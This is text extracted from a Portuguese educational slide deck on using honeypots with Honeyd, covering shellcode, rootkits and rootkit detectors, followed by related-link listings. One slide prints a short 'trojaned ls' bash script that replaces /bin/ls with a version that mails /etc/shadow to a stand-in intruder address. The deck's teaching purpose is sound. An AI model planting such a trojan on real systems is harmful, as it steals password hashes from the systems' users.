ShellCode Um conjunto de instru¸˜es (em c´digo m´quina ou n˜o) co o a a desenvolvidas de maneira a que possam ser injectadas numa aplica¸˜o em tempo de execu¸˜o. ca ca Acesso ilegal a espa¸o de mem´ria n˜o autorizado c o a Injec¸˜o do shellcode ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

RootKits Conjunto de programas malicionsos (trojans, backdoors chkrootkit e rkhunter (Linux)1 ; RootkitRevealer (Windows). 1 Ambos dispon´ ıveis no gestor de pacotes do Ubuntu. Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Trojaned ls #!/ bin / bash mv / bin / ls / bin / ls . old / bin / echo quot; cat / etc / shadow | mail intruso@intruso . pt quot; > / bin / ls / bin / echo quot;/ bin / ls . old quot; >> / bin / ls chmod + x / bin / ls Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Conclus˜o a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Add a comment

Related presentations

Related pages

Honeyd | LinkedIn

View 201 Honeyd posts, presentations, experts, and more. Get the professional knowledge you need on LinkedIn. LinkedIn Home What is LinkedIn? Join Today
Read more

Honeyd - Instalação - YouTube

Honeyd - Instalação ... Implementación honeypots --honeyd - Duration: ... Uso de honeypots no auxílio à detecçâo de ataques ...
Read more

tutorial HONEYPOT - YouTube

Tutorial Honeypot Honeyd - Duration: ... Uso de honeypots no auxílio à detecçâo de ataques - Duration: 55:55. Campus Party 890 views.
Read more

Honeypots e Honeynets: Definições e Aplicações

Normalmente, o uso de honeypots de baixa interatividade também está associado aos seguintes objetivos: ... Honeyd: A Virtual Honeypot Daemon ...
Read more

Honeypot in network security: A survey (PDF Download ...

... Honeypot in network security: A ... A simplified view of the honeyd ... "Alguns trabalhos propõem o uso de honeypots para a captura de ...
Read more

Utilizando honeypots para medição de atividade de rede não ...

O uso de honeypots e honeynets melhora a segurança das redes e seus sistemas. Bruce Schneier [Schneier 2004], ... utilizando o software honeyd.
Read more

Projeto SpamPots: Uso de Honeypots na Obtenção de Métricas ...

Projeto SpamPots: Uso de Honeypots na Obtenc¸ao de M˜ etricas sobre ... Honeypots (2) Honeyd: emulac¸ao de servic¸os ...
Read more

Honeypots | LinkedIn

View 2567 Honeypots posts, presentations, experts, and more. Get the professional knowledge you need on LinkedIn. LinkedIn Home What is LinkedIn? Join Today
Read more